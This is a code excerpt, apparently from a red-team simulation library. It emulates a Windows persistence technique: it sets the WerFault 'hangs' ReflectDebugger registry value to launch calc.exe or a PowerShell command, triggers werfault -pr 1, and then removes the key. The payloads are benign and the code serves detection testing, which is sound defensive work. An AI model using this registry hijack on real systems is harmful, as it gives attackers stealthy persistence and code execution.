def main()

in cortado/rtas/werfault_persistence.py [0:0]

• 38 lines of code
• 2 McCabe index (conditional complexity)

def main():
    reg_key = "'HKLM:\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\hangs'"
    reg_name = "ReflectDebugger"

    commands = ["C:\\Windows\\system32\\calc.exe", "'powershell -c calc.exe'", MY_APP_EXE]

    for command in commands:
        log.info(f"Setting WerFault reg key to `{command}`")
        _ = _common.execute_command(
            [
                "powershell",
                "-c",
                "New-ItemProperty",
                "-Path",
                reg_key,
                "-Name",
                reg_name,
                "-Value",
                command,
            ],
        )
        time.sleep(1)

        log.info("Running WerFault.exe -pr 1")
        _ = _common.execute_command(["werfault", "-pr", "1"])
        time.sleep(2.5)

        _ = _common.execute_command(
            [
                "powershell",
                "-c",
                "Remove-ItemProperty",
                "-Path",
                reg_key,
                "-Name",
                reg_name,
            ]
        )

    log.info("Cleaning up")

    _ = _common.execute_command(["taskkill", "/F", "/im", "calc.exe"])
    _ = _common.execute_command(["taskkill", "/F", "/im", "calculator.exe"])
    _ = _common.execute_command(["taskkill", "/F", "/im", "myapp.exe"])